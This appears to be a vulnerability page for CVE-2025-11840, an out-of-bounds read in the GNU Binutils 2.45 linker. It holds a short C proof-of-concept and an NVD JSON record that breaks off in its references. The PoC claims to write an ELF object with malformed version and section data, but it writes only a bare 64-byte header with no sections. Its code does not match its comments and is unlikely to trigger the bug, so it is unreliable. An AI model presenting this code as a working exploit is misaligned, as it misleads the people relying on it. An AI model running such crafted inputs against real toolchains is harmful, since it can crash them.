CVE-2025-11840

/* CVE-2025-11840 - GNU Binutils 2.45 ldmisc.c vfinfo Out-of-Bounds Read PoC */ /* This PoC demonstrates triggering the OOB read in vfinfo function */ /* Compile with: gcc -o poc poc.c */ /* Usage: ld -o /dev/null crafted_object.o */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> /* Create a minimal ELF object file that triggers vfinfo OOB read */ /* The vulnerability is in ldmisc.c's vfinfo function which handles */ /* version info formatting during linking process */ int main(int argc, char *argv[]) { /* Create a crafted ELF file with malformed version info sections */ /* to trigger the out-of-bounds read in vfinfo */ FILE *fp; unsigned char elf_header[] = { 0x7f, 0x45, 0x4c, 0x46, /* ELF magic */ 0x02, /* 64-bit */ 0x01, /* Little endian */ 0x01, /* ELF version */ 0x00, /* OS/ABI */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* Padding */ 0x02, 0x00, /* ET_EXEC */ 0x3e, 0x00, /* x86-64 */ 0x01, 0x00, 0x00, 0x00, /* ELF version */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* Entry point */ 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* Program header offset */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* Section header offset */ 0x00, 0x00, 0x00, 0x00, /* Flags */ 0x40, 0x00, /* ELF header size */ 0x00, 0x00, /* Program header entry size */ 0x00, 0x00, /* Number of program headers */ 0x00, 0x00, /* Section header entry size */ 0x00, 0x00 /* Number of section headers */ }; fp = fopen("crafted_object.o", "wb"); if (!fp) { perror("fopen"); return 1; } /* Write malformed ELF header with corrupted section info */ /* to trigger vfinfo OOB read during linking */ fwrite(elf_header, 1, sizeof(elf_header), fp); fclose(fp); printf("Crafted object file created. Run: ld crafted_object.o\n"); printf("Expected: OOB read in vfinfo() in ldmisc.c\n"); return 0; }

{"cve": {"id": "CVE-2025-11840", "sourceIdentifier": "[email protected]", "published": "2025-10-16T16:15:37.003", "lastModified": "2026-05-12T13:16:29.570", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in GNU Binutils 2.45. The affected element is the function vfinfo of the file ldmisc.c. Executing a manipulation can lead to out-of-bounds read. The attack can only be executed locally. The exploit has been made available to the public and could be used for attacks. This patch is called 16357. It is best practice to apply a patch to resolve this issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-125"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:binutils:2.45:*:*:*:*:*:*:*", "matchCriteriaId": "60CBCA58-29DE-4A0A-BAF0-D0188FAF4884"}]}]}], "references": [{"url": "https://sourceware.org/bugzilla/attachment.cgi?id=16351", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://sourceware.org/bugzilla/attachment.cgi?id=16357", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=33455", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.328775", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.328775", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.661281", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.gnu.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://cert-portal.siemens.com/produ ... (truncated)